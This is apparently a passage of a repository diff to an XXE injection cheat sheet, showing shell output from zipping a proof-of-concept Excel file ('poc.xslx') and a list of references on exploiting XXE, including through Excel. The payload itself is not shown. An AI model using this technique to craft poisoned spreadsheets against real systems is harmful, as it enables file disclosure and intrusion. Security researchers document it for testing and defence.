$ zip -r ../poc.xslx *
|
||||
updating: [Content_Types].xml (deflated 71%)
|
||||
updating: _rels/ (stored 0%)
|
||||
updating: _rels/.rels (deflated 60%)
|
||||
updating: docProps/ (stored 0%)
|
||||
updating: docProps/app.xml (deflated 51%)
|
||||
updating: docProps/core.xml (deflated 50%)
|
||||
updating: xl/ (stored 0%)
|
||||
updating: xl/workbook.xml (deflated 56%)
|
||||
updating: xl/worksheets/ (stored 0%)
|
||||
updating: xl/worksheets/sheet1.xml (deflated 53%)
|
||||
updating: xl/styles.xml (deflated 60%)
|
||||
updating: xl/theme/ (stored 0%)
|
||||
updating: xl/theme/theme1.xml (deflated 80%)
|
||||
updating: xl/_rels/ (stored 0%)
|
||||
updating: xl/_rels/workbook.xml.rels (deflated 66%)
|
||||
updating: xl/sharedStrings.xml (deflated 17%)
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
@ -403,3 +478,4 @@ GIF (experimental)
|
||||
* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
||||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
||||
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||
|
Loading…
Reference in New Issue
Block a user